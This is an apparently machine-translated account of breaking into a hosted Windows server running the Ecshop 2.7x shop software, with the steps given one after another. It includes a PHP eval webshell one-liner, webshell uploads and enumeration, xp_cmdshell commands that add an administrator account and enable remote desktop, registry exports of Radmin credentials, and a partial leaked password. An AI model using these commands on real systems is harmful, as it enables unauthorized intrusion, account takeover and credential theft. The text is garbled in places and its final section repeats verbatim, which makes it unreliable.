About host defense from intrusion Elevation of Privilege on an IDC Server

A server detection report is recorded for a website. Write this article for reference only to better prevent intrusion.

Target Server: Windows2003 + iis6 + php + mysql + mssql + serv-u
Target Website: Ecshop2.7x

Elevation of Privilege:
General steps
1. Upload asp webshell to detect available components, ports, and directories.
2. Upload the aspx webhsell test execution command to obtain information about processes, services, and ports.

Start

Echop2.7x is vulnerable to several injections, so it is easy to obtain the background logon password.
This method is not described in detail in Baidu.
There are also many methods for Getshell in the background. Here we use module management-database project management-select myship. lbi to insert <? Php eval ($ _ POST [c])?>
Connect http: // site/myship. php in one sentence

Information Collection

I. Check permissions

1. first, php shell checks the directory browsing permission on the server. D:/wwwroot/xxx/wwwroot/can be seen as the practice of managing the website through IDC, independent users have independent permissions to process the current user and cannot jump to different directories.
In addition, c d e and f disks do not have the browsing permission. Because PHP and ASP inherit the permissions of IIS users, directories cannot be listed.

2. List program directories,

360 Microsoft SQL Server comes up with two methods of Elevation of Privilege

Ii. detection target service

Upload asp shell detection Server Components
1. The wscript. shell × command line execution component is not supported

2. Common ports
127.0.0.1: 1433 ...... open
127.0.0.1: 3389 ...... close
127.0.0.1: 43958 ...... open

3. C: Users and SettingsAll Users are not authorized to access
C: Required ents and SettingsAll Users "start" Menu \ The program has no permission to access
C: Documents and SettingsAll UsersDocuments can be read and written.

4. view system services-the user account object does not support this attribute or method (Workstation is disabled)

5. Check if the administrator's grandmother does not work. Wscript. Network (Wscript. Network is disabled)
 

3. iis spy can list IIS users, passwords, domain names, and local paths.

.

4. Process to list processes, which can be used as follows
1 1176 hzclient Huazhong host Client
12 1588 r_server Radmin Control Server
18 10660 shstat mcafee Anti-Virus
55 3548 SERVUTRAY serv-u Server
73 10892 mysqld mysql database

5. Services list Services, which can be used as follows:
29 1176 hzclient d: hzhosthzclient.exe
72 1588 r_server "C: WINDOWSsystem32_server.exe"/service
41 1312 McShield "C: Program FilesMcAfeeVirusScan unzip isemcshield.exe"
50 10892 MySQL51 "E: Program FilesMySQLMySQL Server 5.1 inmysqld" -- defaults-file = "E: Program FilesMySQLMySQL Server 5.1my.ini" MySQL51
79 5708 Serv-u e: program filesServ-UServUDaemon.exe

Iii. Target Service Analysis


Permission escalation ideas: 360 Local Elevation of Privilege, Serv-U Local Elevation of Privilege, mysql root elevation, mssql sa Elevation of Privilege, Huazhong host registry's Elevation of Privilege to read information, and Radmin Registry's Elevation of Privilege to read information.


Iv. Elevation of Privilege

1. Upload 360 Privilege Escalation exp. Calling C: Documents and SettingsAll UsersDocuments cmd.exe through aspx fails to execute. The success of the 360 automatic upgrade is now very small.

2. Serv-U Local Elevation of Privilege, which is executed using the Serv-U Local Elevation tool integrated with aspx. Failed,
 

Password verification is required.
You are not authorized to read the Serv-U configuration file.

3. mysql root Privilege Escalation and find data/mysql/user. myd.
No permission

4. Raise the permission to read information from the registry of the Huazhong host, HKEY_LOCAL_MACHINEsoftwarehzhostconfigsettings.

 

According to the previous vulnerability description, sa and root are available.

Next, use the sysstr tool. An error is prompted when SAS is used for connection.
However, if you log on with the hzhost user, the logon permission is public. Basically, there is no hope to raise the right.
Mssqlpss = 2 PDjjPpqVZqbrnGgy # Why c7eea052b52 cannot be solved
 

Let's take a closer look and find a sysdbsa = tool broken. The ASPX database function is successfully connected!

Sa user with the highest permissions.
Next, add a user and execute


Xp_mongoshell "net user admin udb311/add & net localgroup administrators admin/add"


Enable 3389
Reg add HKLMSYSTEMCurrentControlSetControlTerminal "Server/v fDenyTSConnections/t REG_DWORD/d 00000000/f

Save the preceding code as 3389.bat.
Upload the file to a writable directory and then execute
Xp_mongoshell "C: Documents and SettingsAll UsersDocuments3389.bat"

Successful.
Still unable to connect to 3389, then check that both windows Firewall and ipsec are disabled. Still unable to connect, depressing.


5. Access the Radmin registry to read information and escalate permissions. aspx cannot read this project.
HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParameters
Export with system permission
Regedit/e d: wwwrootxxx radmin. reg HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParameters
The above code is saved as 1. bat upload.
Xp_mongoshell "C: Documents and SettingsAll UsersDocuments1.bat"
Next, use webshell to download the exported radmin. reg.

Sa user with the highest permissions.
Next, add a user and execute


Xp_mongoshell "net user admin udb311/add & net localgroup administrators admin/add"


Enable 3389
Reg add HKLMSYSTEMCurrentControlSetControlTerminal "Server/v fDenyTSConnections/t REG_DWORD/d 00000000/f

Save the preceding code as 3389.bat.
Upload the file to a writable directory and then execute
Xp_mongoshell "C: Documents and SettingsAll UsersDocuments3389.bat"

Successful.
Still unable to connect to 3389, then check that both windows Firewall and ipsec are disabled. Still unable to connect, depressing.


5. Access the Radmin registry to read information and escalate permissions. aspx cannot read this project.
HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParameters
Export with system permission
Regedit/e d: wwwrootxxx radmin. reg HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParameters
The above code is saved as 1. bat upload.
Xp_mongoshell "C: Documents and SettingsAll UsersDocuments1.bat"
Next, use webshell to download the exported radmin. reg.